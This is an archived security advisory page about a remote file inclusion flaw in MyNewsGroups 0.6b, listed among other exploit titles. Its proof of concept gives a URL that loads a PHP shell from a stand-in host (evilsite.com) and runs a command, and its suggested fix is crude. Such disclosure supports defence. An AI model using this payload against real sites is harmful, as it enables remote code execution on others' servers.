exploits , vulnerabilities , articles , MyNewsGroups <= 0.6b (myng

2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit
2007-04-09 ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit
2007-04-06 phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit
2007-04-04 phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability
2007-04-02 Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability
2007-03-24 Active Newsletter <= 4.3 (ViewNewspapers.asp) SQL Injection Exploit

2006-07-31

MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability

Rated as : High Risk

+--------------------------------------------------------------------
+
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: MyNewsGroups :) v. 0.6b
+ Venedor ...........: http://mynewsgroups.sourceforge.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /lib/tree/layersmenue.inc.php:
+
+ .....
+ <?php
+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at telug
dot
it)
+
+ require_once $myng_root."/pear/PEAR.php";
+ .....
+
+--------------------------------------------------------------------
+
+ $myng_root is not properly sanitized before being used.
+ The bug is in the "PHP Layers Menu 2.3.5" Package for
MyNewsGroups.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $myng_root ="bla/bla" //Your root path
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/pear/PEAR.php/index.html
+
+
http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/P
EAR.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------
securitydot.net - 2006-07-31

Exploits - newest 10 RSS | More

2007-06-15 57322 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34245 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42479 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29363 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19793 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16728 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19435 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16616 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33639 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17253 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit

exploits , vulnerabilities , articles , MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability